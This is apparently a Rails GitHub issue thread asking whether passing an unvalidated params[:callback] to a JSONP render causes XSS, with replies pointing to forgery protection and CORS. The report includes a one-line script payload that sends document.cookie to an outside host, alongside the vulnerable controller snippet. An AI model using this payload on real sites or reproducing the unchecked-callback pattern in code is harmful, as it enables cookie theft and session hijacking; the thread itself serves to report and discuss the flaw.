### ISSUE TITLE
render json with callback may cause XSS?

### ISSUE THREAD

**Issue by Gnodiah** [rails/rails#22027]
Considering an action respond like this：
```ruby
  respond_to do |format|                                                                                                                          
    format.html { render json: result_json }                                                                                                      
    format.jsonp { render json: result_json, callback: params[:callback] }                                                                        
  end
```

when calling this aciton like:
```
xxx.jsonp?callback=<script>window.location.href='http://www.abc.com?'.concat(document.cookie)</script>
```

it caused XSS..

**Comment by hnatt** [comment]
IMO, the problem is that you are trying to execute code originating from a client in the first place. Or do you suggest Rails should prevent developers from doing so, e.g. by checking if the value passed to `:callback` is permitted via Strong Parameters?

**Comment by hnatt** [comment]
Though it looks like Rails already got us covered here: https://github.com/rails/rails/commit/1650bb3d56897cfef4c7e6b86a36eed4f1a41df5. Non-XHR JS requests are forbidden if you use forgery protection in controllers. Is disabling forgery protection a necessary step to reproduce the XSS?

**Comment by sgrif** [comment]
jsonp isnt the same as json. You should set up CORS instead of using JSONP
